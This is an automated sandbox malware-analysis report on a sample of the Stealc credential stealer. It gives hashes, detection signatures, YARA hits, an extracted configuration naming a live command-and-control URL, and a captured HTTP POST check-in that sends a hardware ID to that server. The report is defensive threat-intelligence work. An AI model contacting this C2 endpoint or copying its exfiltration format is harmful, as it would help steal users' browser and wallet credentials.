Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8WOUWb5iEv.exe

Overview

General Information

Sample name:8WOUWb5iEv.exe
renamed because original name is a hash value
Original sample name:dbfb5a1fee1df3d86b1cdba9e338b31d.exe
Analysis ID:1544236
MD5:dbfb5a1fee1df3d86b1cdba9e338b31d
SHA1:8ad3ac1b565630891c965f54f4c144da125f572c
SHA256:54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 8WOUWb5iEv.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\8WOUWb5iEv.exe" MD5: DBFB5A1FEE1DF3D86B1CDBA9E338B31D)
    • WerFault.exe (PID: 7108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.8WOUWb5iEv.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.8WOUWb5iEv.exe.2500000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.8WOUWb5iEv.exe.2500000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.8WOUWb5iEv.exe.23f0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.8WOUWb5iEv.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-29T04:56:59.964831+010020442431Malware Command and Control Activity Detected192.168.2.44973077.83.175.10580TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 8WOUWb5iEv.exeAvira: detected
                      Source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}
                      Source: http://77.83.175.105Virustotal: Detection: 7%Perma Link
                      Source: 8WOUWb5iEv.exeReversingLabs: Detection: 42%
                      Source: 8WOUWb5iEv.exeVirustotal: Detection: 39%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 8WOUWb5iEv.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00419030
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C920
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02409297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_02409297
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FA477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_023FA477
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FA517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_023FA517
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023F7507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_023F7507
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FCB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_023FCB87

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeUnpacked PE file: 0.2.8WOUWb5iEv.exe.400000.1.unpack
                      Source: 8WOUWb5iEv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: my_library.pdbU source: 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: my_library.pdb source: 8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02404357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02404357
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_023FC0A7
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_023FF087
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023FE177
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_023FE797
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023FFA17
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02404A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_02404A27
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023F1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023F1977
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02403D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02403D67
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02404DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02404DC7
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_023FDDE7

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 77.83.175.105:80
                      Source: Malware configuration extractorURLs: http://77.83.175.105/18a9a962225b1ffb.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 77.83.175.105Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 77.83.175.105Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 38 31 41 36 42 35 46 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="hwid"8A81A6B5F3762778904926------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build"LogsDiller------IDHDGIEHJJJJEBGDAFHJ--
                      Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004048D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004048D0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 77.83.175.105Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 77.83.175.105Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 38 31 41 36 42 35 46 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="hwid"8A81A6B5F3762778904926------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build"LogsDiller------IDHDGIEHJJJJEBGDAFHJ--
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.php
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.php%:
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.php4
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpT
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpk:
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/7:
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/AL
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/d:iU
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105;
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                      Source: 8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_00409E30

                      System Summary

                      barindex
                      Source: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_024382DF0_2_024382DF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0246134F0_2_0246134F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0246A08F0_2_0246A08F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0244B1CF0_2_0244B1CF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_024211DF0_2_024211DF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0245A19F0_2_0245A19F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_024336EF0_2_024336EF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0247A76F0_2_0247A76F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0242F4FF0_2_0242F4FF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0244A5FF0_2_0244A5FF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0242159F0_2_0242159F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0245CA0F0_2_0245CA0F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02433A0F0_2_02433A0F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02469AAF0_2_02469AAF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02478B640_2_02478B64
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02435B2F0_2_02435B2F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0246C8050_2_0246C805
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0241D9AB0_2_0241D9AB
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0245FFEF0_2_0245FFEF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02465C000_2_02465C00
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0244AD0F0_2_0244AD0F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0245ED3D0_2_0245ED3D
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: String function: 00404610 appears 317 times
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052
                      Source: 8WOUWb5iEv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 8WOUWb5iEv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00418810
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413970
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\BELOWZON.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\36bdbd5a-eb9e-4cb9-ab5a-c956dd20c6faJump to behavior
                      Source: 8WOUWb5iEv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 8WOUWb5iEv.exeReversingLabs: Detection: 42%
                      Source: 8WOUWb5iEv.exeVirustotal: Detection: 39%
                      Source: unknownProcess created: C:\Users\user\Desktop\8WOUWb5iEv.exe "C:\Users\user\Desktop\8WOUWb5iEv.exe"
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: ncrypt.dllJump to behavior
